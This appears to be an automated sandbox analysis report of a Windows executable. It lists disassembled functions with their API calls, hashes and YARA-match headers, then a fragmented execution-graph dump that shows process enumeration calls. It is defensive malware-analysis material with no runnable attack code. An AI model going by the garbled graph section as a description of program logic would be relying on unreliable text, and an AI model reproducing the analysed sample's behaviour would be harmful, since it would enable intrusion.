                                                    • __alloca_probe_16.LIBCMT ref: 00C68CE9
                                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 00C68D28
                                                    • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00C68D45
                                                    • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00C68D84
                                                    • __alloca_probe_16.LIBCMT ref: 00C68DA1
                                                    • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00C68DE3
                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00C68E06
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2087215980.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                    • Associated: 00000000.00000002.2087198453.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2087240856.0000000000C88000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2087255940.0000000000C94000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2087255940.0000000000CC7000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2087296795.0000000000CCB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c60000_56bDgH9sMQ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                                    • String ID:
                                                    • API String ID: 2040435927-0
                                                    • Opcode ID: 4a87573d620b8740ffc59f2be2fb17c2118b521102e7d7557892da91fd78f368
                                                    • Instruction ID: 86e31920b2fd018b894e6bf572005c78435adc761949964cacc0ed90e162e35e
                                                    • Opcode Fuzzy Hash: 4a87573d620b8740ffc59f2be2fb17c2118b521102e7d7557892da91fd78f368
                                                    • Instruction Fuzzy Hash: 0A51AF72500216AFEB309F61CC85FAF7BA9EF44744F144625F914AA190DF318E18DB60
                                                    APIs
                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00C627AD
                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00C627CB
                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00C627EC
                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00C6283C
                                                    • std::_Facet_Register.LIBCPMT ref: 00C62866
                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00C6287F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2087215980.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                    • Associated: 00000000.00000002.2087198453.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2087240856.0000000000C88000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2087255940.0000000000C94000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2087255940.0000000000CC7000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2087296795.0000000000CCB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c60000_56bDgH9sMQ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: std::_$Lockit$Lockit::~_$Lockit::_$Facet_Register
                                                    • String ID:
                                                    • API String ID: 1858714459-0
                                                    • Opcode ID: bb6a4343347479058c3efec350a4b069609988f0cf094bd394ac74bcb48073a2
                                                    • Instruction ID: bd21036e065d7d593305dd8a7bbe08abbc4ac8d28709d2af74785d883a160ed7
                                                    • Opcode Fuzzy Hash: bb6a4343347479058c3efec350a4b069609988f0cf094bd394ac74bcb48073a2
                                                    • Instruction Fuzzy Hash: 1021C3329046118BC735DF14ECC4A5EB7A1FB58320F14055DE891572A2DB35AE0AC7C2
                                                    APIs
                                                    • GetLastError.KERNEL32(?,?,00C6C421,00C6AB5A,00C69AE6), ref: 00C6C438
                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00C6C446
                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00C6C45F
                                                    • SetLastError.KERNEL32(00000000,00C6C421,00C6AB5A,00C69AE6), ref: 00C6C4B1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2087215980.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                    • Associated: 00000000.00000002.2087198453.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2087240856.0000000000C88000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2087255940.0000000000C94000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2087255940.0000000000CC7000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2087296795.0000000000CCB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c60000_56bDgH9sMQ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorLastValue___vcrt_
                                                    • String ID:
                                                    • API String ID: 3852720340-0
                                                    • Opcode ID: 8163a88616866c83efdbbe62394f93162fff87a766ee7c065f7a231cc1b7f9e6
                                                    • Instruction ID: 1e046b5b98bdff694214224b29f12ab48a1de57eb1423def11b9d9a7a3e35607
                                                    • Opcode Fuzzy Hash: 8163a88616866c83efdbbe62394f93162fff87a766ee7c065f7a231cc1b7f9e6
                                                    • Instruction Fuzzy Hash: 9601423260C722AEA63027F5FCD5F3E2684EF41B74320432FF924820E9EF158C026648
                                                    APIs
                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,BF955749,?,?,00000000,00C866D3,000000FF,?,00C7442E,?,?,00C74402,00000016), ref: 00C744D3
                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00C744E5
                                                    • FreeLibrary.KERNEL32(00000000,?,00000000,00C866D3,000000FF,?,00C7442E,?,?,00C74402,00000016), ref: 00C74507
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2087215980.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                    • Associated: 00000000.00000002.2087198453.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2087240856.0000000000C88000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2087255940.0000000000C94000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2087255940.0000000000CC7000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2087296795.0000000000CCB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c60000_56bDgH9sMQ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                    • String ID: CorExitProcess$mscoree.dll
                                                    • API String ID: 4061214504-1276376045
                                                    • Opcode ID: 0dce807759a67ac4bd75423a774bb2396eb1228fcc0508f3dbbc820192a503ad
                                                    • Instruction ID: 70699931322c23ac825b5b0849e38b3bf6bd3c008f815bf091bfa36aa1fcfc82
                                                    • Opcode Fuzzy Hash: 0dce807759a67ac4bd75423a774bb2396eb1228fcc0508f3dbbc820192a503ad
                                                    • Instruction Fuzzy Hash: 6401A231944629AFDB169F50DC09FAEBBB8FB04B15F004225F821A26D0DF749904CB88
                                                    APIs
                                                    • __alloca_probe_16.LIBCMT ref: 00C7A14A
                                                    • __alloca_probe_16.LIBCMT ref: 00C7A20B
                                                    • __freea.LIBCMT ref: 00C7A272
                                                      • Part of subcall function 00C77686: HeapAlloc.KERNEL32(00000000,00000001,?,?,00C69E48,?,?,?,?,?,00C62D6E,00000001,?), ref: 00C776B8
                                                    • __freea.LIBCMT ref: 00C7A287
                                                    • __freea.LIBCMT ref: 00C7A297
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2087215980.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                    • Associated: 00000000.00000002.2087198453.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2087240856.0000000000C88000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2087255940.0000000000C94000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2087255940.0000000000CC7000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2087296795.0000000000CCB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c60000_56bDgH9sMQ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: __freea$__alloca_probe_16$AllocHeap
                                                    • String ID:
                                                    • API String ID: 1096550386-0
                                                    • Opcode ID: ca82d8eab4747352c95fc355fb49d99f21224b5760ea9197ed171af8dfadc8d0
                                                    • Instruction ID: 14b4479add721ca7935b3f83c8c576053468884058b0ca56850835a5653f92b1
                                                    • Opcode Fuzzy Hash: ca82d8eab4747352c95fc355fb49d99f21224b5760ea9197ed171af8dfadc8d0
                                                    • Instruction Fuzzy Hash: A851C272600206AFEF259FA5CC81EBF3BA9EF84750F158128FD1CD6151EA32CD5097A2
                                                    APIs
                                                    • __EH_prolog3.LIBCMT ref: 00C67B2B
                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00C67B35
                                                      • Part of subcall function 00C63260: std::_Lockit::_Lockit.LIBCPMT ref: 00C6326F
                                                      • Part of subcall function 00C63260: std::_Lockit::~_Lockit.LIBCPMT ref: 00C6328A
                                                    • codecvt.LIBCPMT ref: 00C67B6F
                                                    • std::_Facet_Register.LIBCPMT ref: 00C67B86
                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00C67BA6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2087215980.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                    • Associated: 00000000.00000002.2087198453.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2087240856.0000000000C88000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2087255940.0000000000C94000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2087255940.0000000000CC7000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2087296795.0000000000CCB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c60000_56bDgH9sMQ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
                                                    • String ID:
                                                    • API String ID: 712880209-0
                                                    • Opcode ID: 7f2395eb1004004c791a8e112a38439ee36e84b0fb4311076f6f8230d47e3a15
                                                    • Instruction ID: ec79afdca3acf719dc65fa56f4425ce393a562f05bacb436e9ecab0f189c77b0
                                                    • Opcode Fuzzy Hash: 7f2395eb1004004c791a8e112a38439ee36e84b0fb4311076f6f8230d47e3a15
                                                    • Instruction Fuzzy Hash: 6911E6B19046189FCB24EF64C885BAE77B5EF84724F24064DF441A7391DFB49E019B91
                                                    APIs
                                                    • __EH_prolog3.LIBCMT ref: 00C6677C
                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00C66786
                                                      • Part of subcall function 00C63260: std::_Lockit::_Lockit.LIBCPMT ref: 00C6326F
                                                      • Part of subcall function 00C63260: std::_Lockit::~_Lockit.LIBCPMT ref: 00C6328A
                                                    • codecvt.LIBCPMT ref: 00C667C0
                                                    • std::_Facet_Register.LIBCPMT ref: 00C667D7
                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00C667F7
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2087215980.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                    • Associated: 00000000.00000002.2087198453.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2087240856.0000000000C88000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2087255940.0000000000C94000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2087255940.0000000000CC7000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2087296795.0000000000CCB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c60000_56bDgH9sMQ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
                                                    • String ID:
                                                    • API String ID: 712880209-0
                                                    • Opcode ID: 41146e64fbd29cf9d88b3b44204540318c9c3fec4571909690081d42d5dc9e0d
                                                    • Instruction ID: 5ce0904d1e4b3e12009ee3b25ebc1492d527f6da69f861a0c301bf34c7536ee1
                                                    • Opcode Fuzzy Hash: 41146e64fbd29cf9d88b3b44204540318c9c3fec4571909690081d42d5dc9e0d
                                                    • Instruction Fuzzy Hash: 6211E4B1900255DFCB20EF68C9856AE77F4FF84320F24050DF451A7282DB749A01DB81
                                                    APIs
                                                    • __EH_prolog3.LIBCMT ref: 00C65F51
                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00C65F5C
                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00C65FCA
                                                      • Part of subcall function 00C660AD: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00C660C5
                                                    • std::locale::_Setgloballocale.LIBCPMT ref: 00C65F77
                                                    • _Yarn.LIBCPMT ref: 00C65F8D
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2087215980.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                    • Associated: 00000000.00000002.2087198453.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2087240856.0000000000C88000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2087255940.0000000000C94000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2087255940.0000000000CC7000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2087296795.0000000000CCB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c60000_56bDgH9sMQ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                    • String ID:
                                                    • API String ID: 1088826258-0
                                                    • Opcode ID: 931d188191587e7ca6842e431d74deecf82292913e330303f270cb55c7efceb6
                                                    • Instruction ID: 6efdd7158f95f884cb4a0ef51cbc13d4c4f6b8f8517f82e952a11de4c5cbe6a6
                                                    • Opcode Fuzzy Hash: 931d188191587e7ca6842e431d74deecf82292913e330303f270cb55c7efceb6
                                                    • Instruction Fuzzy Hash: 58018F75A01A209BCB26EF60D9C9B7D7BB5FF85350F244018E85657381CF386E06EB89
                                                    APIs
                                                    • LoadLibraryExW.KERNEL32(00000011,00000000,00000800,?,00C6D523,00000000,00000001,00CC997C,?,?,?,00C6D6C6,00000004,InitializeCriticalSectionEx,00C89F88,InitializeCriticalSectionEx), ref: 00C6D57F
                                                    • GetLastError.KERNEL32(?,00C6D523,00000000,00000001,00CC997C,?,?,?,00C6D6C6,00000004,InitializeCriticalSectionEx,00C89F88,InitializeCriticalSectionEx,00000000,?,00C6D47D), ref: 00C6D589
                                                    • LoadLibraryExW.KERNEL32(00000011,00000000,00000000,?,00000011,00C6C393), ref: 00C6D5B1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2087215980.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                    • Associated: 00000000.00000002.2087198453.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2087240856.0000000000C88000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2087255940.0000000000C94000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2087255940.0000000000CC7000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2087296795.0000000000CCB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c60000_56bDgH9sMQ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: LibraryLoad$ErrorLast
                                                    • String ID: api-ms-
                                                    • API String ID: 3177248105-2084034818
                                                    • Opcode ID: 6654333e6e2514067172fca468357cd35cc953a9131928de505fc3748984fc96
                                                    • Instruction ID: b0fa4a84725192b803a7e46df7a741bc681e8d6ee5292e49ede9d426b6f05202
                                                    • Opcode Fuzzy Hash: 6654333e6e2514067172fca468357cd35cc953a9131928de505fc3748984fc96
                                                    • Instruction Fuzzy Hash: A1E01A70784304BAEF302FA0EC46B593B559B10B54F544020FA0EA88A1DBB5AA58AB88
                                                    APIs
                                                    • GetConsoleOutputCP.KERNEL32(BF955749,00000000,00000000,00000000), ref: 00C7A7DA
                                                      • Part of subcall function 00C7CD2A: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00C7A268,?,00000000,-00000008), ref: 00C7CDD6
                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00C7AA35
                                                    • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00C7AA7D
                                                    • GetLastError.KERNEL32 ref: 00C7AB20
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                    • String ID:
                                                    • API String ID: 2112829910-0
                                                    • Opcode ID: 41134b96a792695a1e8730f6164d3b9229a4eaecb6b8fa3dfb217f1d63bd829c
                                                    • Instruction ID: 351c9ce98c332d91490f3cfae09d1c158270be631d2da25797e1fac9a31d805a
                                                    • Opcode Fuzzy Hash: 41134b96a792695a1e8730f6164d3b9229a4eaecb6b8fa3dfb217f1d63bd829c
                                                    • Instruction Fuzzy Hash: 16D157B5D002489FCB15CFE8D880AADBBB5FF48310F18856AE86AE7351D730A946CF51
                                                    APIs
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AdjustPointer
                                                    • String ID:
                                                    • API String ID: 1740715915-0
                                                    • Opcode ID: 9449a585bb51b6bff42b47c2d3a3481fc51f3214f31c1da5252729b2992c37f3
                                                    • Instruction ID: e4022a1d44775208b15ec60b8143e45780fa3460cc3cfdad8f04d1f124bbc7d3
                                                    • Opcode Fuzzy Hash: 9449a585bb51b6bff42b47c2d3a3481fc51f3214f31c1da5252729b2992c37f3
                                                    • Instruction Fuzzy Hash: 7F510072600206AFDB389F51C9C1BBA77A4EF44710F20452DF8A697291D731ED90EB94
                                                    APIs
                                                      • Part of subcall function 00C7CD2A: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00C7A268,?,00000000,-00000008), ref: 00C7CDD6
                                                    • GetLastError.KERNEL32 ref: 00C7D1AA
                                                    • __dosmaperr.LIBCMT ref: 00C7D1B1
                                                    • GetLastError.KERNEL32(?,?,?,?), ref: 00C7D1EB
                                                    • __dosmaperr.LIBCMT ref: 00C7D1F2
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                    • String ID:
                                                    • API String ID: 1913693674-0
                                                    • Opcode ID: 3fad3c31a5142faed5d8ac6393b29a44a66c5b7f811a65fee7a71f701d5ee13a
                                                    • Instruction ID: 451b6f8761f570d066a9b32d3ec08e6a713c4886f4398fdf7c31ade45060ae4e
                                                    • Opcode Fuzzy Hash: 3fad3c31a5142faed5d8ac6393b29a44a66c5b7f811a65fee7a71f701d5ee13a
                                                    • Instruction Fuzzy Hash: 4B219271600205AFDB20AF66DC8196FB7B9EF00374B54C529F92ED7152DB30EE41ABA0
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8bf1325c66453531c7668fd8c89b960c7de780472d7b6c7f276b1efa60f59254
                                                    • Instruction ID: 3cc2d4f00de348fe594fef508ea7d08c065c4ff22ab86719df7310b59d014491
                                                    • Opcode Fuzzy Hash: 8bf1325c66453531c7668fd8c89b960c7de780472d7b6c7f276b1efa60f59254
                                                    • Instruction Fuzzy Hash: 9B21A1B1600285BFDB20AF759C8096B7BA9EF403A4714C525FA2DDB151E770EF40B760
                                                    APIs
                                                    • GetEnvironmentStringsW.KERNEL32 ref: 00C7E0E4
                                                      • Part of subcall function 00C7CD2A: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00C7A268,?,00000000,-00000008), ref: 00C7CDD6
                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00C7E11C
                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00C7E13C
                                                    Yara matches
                                                    Similarity
                                                    • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                    • String ID:
                                                    • API String ID: 158306478-0
                                                    • Opcode ID: aae9aca90168d8b057d86963d4cfff41e37d66a32cafe935b0fec529d82e7eae
                                                    • Instruction ID: 755064fa6ce795b131c20058c49f72e33bc26abb49ed9f7ab16375541778fc28
                                                    • Opcode Fuzzy Hash: aae9aca90168d8b057d86963d4cfff41e37d66a32cafe935b0fec529d82e7eae
                                                    • Instruction Fuzzy Hash: 7F11D6B350561A7F672227B65C8ED7F6E6CDE897987508564F40ED1102FE34CE0196B0
                                                    APIs
                                                    • WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,00000000,?,00C83A64,00000000,00000001,00000000,00000000,?,00C7AB74,00000000,00000000,00000000), ref: 00C84CC0
                                                    • GetLastError.KERNEL32(?,00C83A64,00000000,00000001,00000000,00000000,?,00C7AB74,00000000,00000000,00000000,00000000,00000000,?,00C7B0FB,00000000), ref: 00C84CCC
                                                      • Part of subcall function 00C84C92: CloseHandle.KERNEL32(FFFFFFFE,00C84CDC,?,00C83A64,00000000,00000001,00000000,00000000,?,00C7AB74,00000000,00000000,00000000,00000000,00000000), ref: 00C84CA2
                                                    • ___initconout.LIBCMT ref: 00C84CDC
                                                      • Part of subcall function 00C84C54: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00C84C83,00C83A51,00000000,?,00C7AB74,00000000,00000000,00000000,00000000), ref: 00C84C67
                                                    • WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,?,00C83A64,00000000,00000001,00000000,00000000,?,00C7AB74,00000000,00000000,00000000,00000000), ref: 00C84CF1
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                    • String ID:
                                                    • API String ID: 2744216297-0
                                                    • Opcode ID: 3c85266475ea432a5ff4c378ee72845bdf474d6ed4962435e9c54a97dc22e9e7
                                                    • Instruction ID: 6be33151c23830c76ddee02b89456de4f087647189bac5ad0f6a0cb868de8375
                                                    • Opcode Fuzzy Hash: 3c85266475ea432a5ff4c378ee72845bdf474d6ed4962435e9c54a97dc22e9e7
                                                    • Instruction Fuzzy Hash: B3F03036002115BBCF622F91DC08F9E3F6AFB083A4B044410FE2C85530CF328968AB99
                                                    APIs
                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 00C6C26F
                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 00C6C323
                                                    Strings
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CurrentImageNonwritable___except_validate_context_record
                                                    • String ID: csm
                                                    • API String ID: 3480331319-1018135373
                                                    • Opcode ID: f7ab06e937b3971afcc577621dee66a37a9f7b427564f4c5b671302b1ff2ddfd
                                                    • Instruction ID: 774e10ca49205c3fd854e2774470d9b14b1d5b778cd5270345b38613a23fcbba
                                                    • Opcode Fuzzy Hash: f7ab06e937b3971afcc577621dee66a37a9f7b427564f4c5b671302b1ff2ddfd
                                                    • Instruction Fuzzy Hash: 27419335A002089BCF20DFA9C8D4ABE7BB5EF45318F148165E865AB392D731AE15CB91
                                                    APIs
                                                    • EncodePointer.KERNEL32(00000000,?), ref: 00C6CB62
                                                    Strings
                                                    Yara matches
                                                    Similarity
                                                    • API ID: EncodePointer
                                                    • String ID: MOC$RCC
                                                    • API String ID: 2118026453-2084237596
                                                    • Opcode ID: 4463afc8a4a4aaeb831bfd7647703e5f31c83d495dc7d66f1f68aebf8de2bfb2
                                                    • Instruction ID: 680ba45b82d2187dddf5a3423e0006b89112549705c676f82d29267940ed2efb
                                                    • Opcode Fuzzy Hash: 4463afc8a4a4aaeb831bfd7647703e5f31c83d495dc7d66f1f68aebf8de2bfb2
                                                    • Instruction Fuzzy Hash: FD413572900209AFCF25DF98CDC1ABEBBB5FF48300F198059F958A7261D3359A61DB91
                                                    APIs
                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00C62995
                                                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00C629DA
                                                      • Part of subcall function 00C66048: _Yarn.LIBCPMT ref: 00C66067
                                                      • Part of subcall function 00C66048: _Yarn.LIBCPMT ref: 00C6608B
                                                    Strings
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                    • String ID: bad locale name
                                                    • API String ID: 1908188788-1405518554
                                                    • Opcode ID: a9ba9387caf594e505c24f95733ddeb716f34c534ebdc40652d751334959f51e
                                                    • Instruction ID: 21e8340397c1ed9bccfe005868f391c891a018ceb677d2e782671f1ed19eb66d
                                                    • Opcode Fuzzy Hash: a9ba9387caf594e505c24f95733ddeb716f34c534ebdc40652d751334959f51e
                                                    • Instruction Fuzzy Hash: 9FF017B1105B408ED370DF798845743BAE0AF29314F048E2EE4CAC7A51E375E549CBAA
                                                    APIs
                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00C6326F
                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00C6328A
                                                    Strings
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                    • String ID: ios_base::badbit set
                                                    • API String ID: 593203224-3882152299
                                                    • Opcode ID: 6c4435ee9f4e4e7871327e56923e9b28e115215ba2292c170f9c4a4e0a231e97
                                                    • Instruction ID: 0a25673d4e9ac69d3dce03412d6807e300decb38f8992b4f6d6beb5fdb72074e
                                                    • Opcode Fuzzy Hash: 6c4435ee9f4e4e7871327e56923e9b28e115215ba2292c170f9c4a4e0a231e97
                                                    • Instruction Fuzzy Hash: D6E0B671518211EFD774DF18D891B9AB3E4EB24721F20066EE4C5821A1EBB499C5DB81

                                                    Execution Graph

                                                    Execution Coverage:4.9%
                                                    Dynamic/Decrypted Code Coverage:0.7%
                                                    Signature Coverage:12.2%
                                                    Total number of Nodes:2000
                                                    Total number of Limit Nodes:37
411668 lstrcpyA 79934->79937 79936 41177a lstrcpyA 79935->79936 79938 419438 79936->79938 79939 4197cc 79937->79939 79942 41185b 4 API calls 79938->79942 79940 40134c lstrcpyA 79939->79940 79941 4197da 79940->79941 81134 4058c4 79941->81134 79944 41945a 79942->79944 79945 41177a lstrcpyA 79944->79945 79947 419466 79945->79947 79946 4197e0 81315 4148a0 79946->81315 79951 41185b 4 API calls 79947->79951 79949 4197e8 79950 411668 lstrcpyA 79949->79950 79952 41980a 79950->79952 79953 419488 79951->79953 79954 40134c lstrcpyA 79952->79954 79955 41177a lstrcpyA 79953->79955 79956 419818 79954->79956 79958 419494 79955->79958 79957 4058c4 40 API calls 79956->79957 79959 41981e 79957->79959 79962 41185b 4 API calls 79958->79962 81322 4145d9 79959->81322 79961 419826 79963 411668 lstrcpyA 79961->79963 79964 4194b6 79962->79964 79965 419848 79963->79965 79966 41177a lstrcpyA 79964->79966 79967 40134c lstrcpyA 79965->79967 79968 4194c2 79966->79968 79969 419856 79967->79969 79971 41185b 4 API calls 79968->79971 79970 4058c4 40 API calls 79969->79970 79972 41985c 79970->79972 79973 4194e4 79971->79973 81333 4147a4 79972->81333 79975 41177a lstrcpyA 79973->79975 79977 4194f0 79975->79977 79976 419864 79978 40134c lstrcpyA 79976->79978 79981 41185b 4 API calls 79977->79981 79979 419875 79978->79979 81341 4151e4 79979->81341 79984 419512 79981->79984 79982 41987a 79983 4116b4 lstrcpyA 79982->79983 79985 41988b 79983->79985 79986 41177a lstrcpyA 79984->79986 79988 411668 lstrcpyA 79985->79988 79987 41951e 79986->79987 79990 41185b 4 API calls 79987->79990 79989 4198a1 79988->79989 81681 404ad5 79989->81681 79992 419540 79990->79992 79994 41177a lstrcpyA 79992->79994 79993 4198a6 79995 40134c lstrcpyA 79993->79995 79996 41954c 79994->79996 79999 41185b 4 API calls 79996->79999 80001 41956e 79999->80001 80003 41177a lstrcpyA 80001->80003 80016 41957a 80003->80016 80812 4138ba CreateToolhelp32Snapshot Process32First 80016->80812 80821 412d64 80040->80821 80212->79711 80213->79717 
